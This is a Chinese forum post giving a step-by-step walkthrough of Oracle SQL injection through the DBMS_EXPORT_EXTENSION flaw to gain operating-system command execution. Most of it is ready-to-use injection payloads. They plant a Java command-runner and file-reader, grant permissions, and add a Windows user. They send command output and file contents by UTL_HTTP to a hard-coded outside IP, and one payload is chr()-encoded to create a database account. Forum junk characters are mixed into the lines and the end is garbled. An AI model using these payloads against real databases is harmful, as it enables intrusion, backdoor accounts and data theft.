
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时把 select SYS.DBMS_EXPORT_EXTENSION..... 改成

  T# |, H0 `1 L9 f7 B6 O, ~1 B8 G  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 0 J" K6 W* y" E" X
的形式即可。(用" 'a'|| "是为了让语句返回true值)
语句有点长,可能要用POST提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数(前提是目标 Oracle 尚未安装修复该包 PL/SQL 注入缺陷的安全补丁),在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
5 k! o- F, c; f$ p* q, x# _* n) e7 u% {/xxx.jsp?id=1 and '1'<>'a'||( ( A) g8 {* u. V/ F2 S
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 W8 C, |: Q9 Jcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
" {2 Q7 o. `( B! x5 n6 enew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}) x1 Y. g4 v$ _
}'''';END;'';END;--','SYS',0,'1',0) from dual ' O, x! D2 h2 ?$ |0 x. `+ s
) # n" E$ M2 D' X% T0 l7 `- A, b+ a- A
------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||(
$ @) N8 q) L9 |" l& z* qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''', B) i5 |- L$ y$ h" P
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(& \" Z5 V' c; Q: I) k
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}; h7 S, T; a* M! V& M
}'''';END;'';END;--','SYS',0,'1',0) from dual - O7 C; h3 K1 b5 k# i
) % N9 D6 Z, d. u) _# s
同时把后面步骤 提到的 对readFile()的处理语句去掉。
------------------------------
2.赋Java权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ X8 n. i4 U1 _  L# j8 }2 Gcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual# u$ y# E+ e$ s5 b2 a9 A
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''  T+ w1 c% ?" k* v3 L/ j
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual7 N* E- y% l! q9 Q5 d- p! x9 r2 r
4.赋public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
. d$ _4 W2 w: q% O' mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual# h9 z, z; p' S% T3 D% t+ A' ^
5.测试上面的几步是否成功
and '1'<>'11'||(
1 _: @' ^8 v" Y7 E2 I$ {  |6 J& gselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' 0 i) p' S2 X1 E
) " L: |, C# Q2 g4 P+ j: ^; u
and '1'<>( : j! S" x% P3 [$ ^" M2 Y
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
/ B. m5 `5 r# c)
6.执行命令:
/xxx.jsp?id=1 and '1'<>( * x* ~( n- Z& i6 ~3 C/ p
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
$ |9 {0 f1 C6 x/ }' V( g. ?& x. m/ g* Q) a
) & x( @! d+ T. z$ F( G, G) [+ F
/xxx.jsp?id=1 and '1'<>( 0 x! T9 E  }+ L! L% M
select  sys.LinxReadFile('c:/boot.ini') from dual9 d* [* {" ~, |$ b
7 k. e, n5 R) w8 u
)& ]( k) ]6 |+ C3 J1 [% Z* Y
  0 y+ s/ u# P( ]) _9 H( @7 I. U# B
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
* j% z+ x0 c* s, u, l/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用UTL_HTTP.request():
- s: @" c. h' |) R$ x5 }/xxx.jsp?id=1 and '1'<>(
0 ?7 I, ~, Y. |3 [: b, f/ DSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual: K" x& Y  {1 n7 Y# `8 p$ V/ P
)
5 v) X) D* w& w/xxx.jsp?id=1 and '1'<>( 5 f/ b+ z/ e3 k$ K- R, @  A
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
. q6 q; z1 d/ k) ~& p)
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
--------------------
6.内部变化
通过以下命令可以查看all_objects表的改变:
' \0 l; g* x. F4 ?3 P! dselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
7.删除我们创建的函数
; m  r) j! ]8 g) L2 b3 u0 X' z. hselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''/ e+ u' _! i1 _& R* Z
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual $ T. j: ^- V" R+ |* j
====================================================
全文结束。谨以此文赠与我的朋友。
. G7 J6 @7 S$ T8 ^. }# mlinx
% ]( L" B$ D: s1 u! v8 L* z) H124829445 6 w, S  c- s" z9 r: G. K1 r
2008.1.12
8 J  C9 Q$ P" T* F, d7 qlinyujian@bjfu.edu.cn
4 g! _" u. j: R+ \8 [( m======================================================================
测试漏洞的另一方法:
创建oracle帐号:
- u1 e5 R, |( T4 wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. u* v1 U/ D( p+ c8 t/ C0 t9 oCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual$ D- P: l- T! W' F5 ?0 K
即:
: k: D$ @, H6 M5 ?select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),8 u. A6 u; H3 ?6 o0 D, I- T1 o' S
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在:
1<>(
2 _1 N& O& k. h% Rselect user_id from all_users where username='LINXSQL'
! }: {+ P8 G; v' e7 _)
给linxsql连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" z# w, E7 i; ^$ T: KGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' h; w7 @9 f# u) Kdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual & C; F2 W6 C8 C7 O$ x) j) E
======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的(authid current_user,即以调用者的权限运行),可能仅仅是public权限,作用似乎不大,真的要用的话可以考虑grant dba to 当前的User:
1.jsp?id=1 and '1'<>( " {: d( @7 X  l
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
5 C8 B) K- z" O$ o! Acreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
9 A! y' F, ^3 L1 t) u; N; [! s# H- |' d) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
! Q8 ^# r. c9 u- ~ )
" M" U' ^1 v9 A5 R6 T' u5 h) ^
" \5 d; y% A6 m0 |" p! @) v
1 x5 U6 I" }& M- \% ?4 s' O! Y' V: T9 L; O- R  D